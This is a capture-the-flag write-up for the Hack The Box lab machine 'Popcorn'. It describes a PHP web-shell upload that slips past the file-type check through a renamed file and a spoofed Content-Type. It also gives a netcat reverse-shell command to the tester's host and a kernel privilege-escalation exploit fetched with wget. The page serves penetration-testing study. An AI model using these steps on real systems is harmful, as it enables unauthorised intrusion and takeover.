Hacking
Github
Twitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
PurpleSharp
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By
GitBook
Popcorn
Popcorn - 10.10.10.6
Target Enumeration:
OS: Linux
IP: 10.10.10.6
User: 5e36a919398ecc5d5c110f2d865cf136
Root: f122331023a9393319a0370129fd9b14
Ports / Services / Software Versions Running
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
Vulnerability Exploited:
Photo upload allows remote code execution by injecting a malicious php file and modifying the request with burp.
Privilege escalation
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
​
https://www.exploit-db.com/exploits/14339/
Exploiting the host:
Nmap
Dirb found /torrent
Appears to be a torrent hosting application
Application allows users to sign up and upload torrents.
Find a clean torrent file (I used debian)
Upload it to the app.
Edit the torrent once it is uploaded.
The vulnerable point is the photo section so find a simple backdoor php shell.
Rename it to shell.jpg.php and upload the shell to the app. Catch the request in burp.
Change content type to: Content-Type: image/jpg
This successfully uploaded.
Inspect the image from the webapp to find the true path.
Visit the true path and issue ?cmd=id after the .php extension.
Looking in /bin we see nc is installed.
Set a listener in 443 and execute nc -e /bin/bash 10.10.14.11 443 via the browser.
Now you have a shell.
Move to /dev/shm and download enumeration scripts
Google the kernel for privesc opportunities.
Run further tools while researching kernel exploits.
Easiest way may be full nelson based on the uname -a output.
Download from exploitdb
wget
https://www.exploit-db.com/download/15704.c
Now on popcorn download and compile the exploit then run it to get root.
​
Hack The Box last updated - 2019 - Previous
Optimum
Next - Hack The Box last updated - 2019
Beep
Last modified
3yr ago
Copy link
Outline
Popcorn - 10.10.10.6
Target Enumeration:
Ports / Services / Software Versions Running
Vulnerability Exploited:
Privilege escalation
Exploiting the host: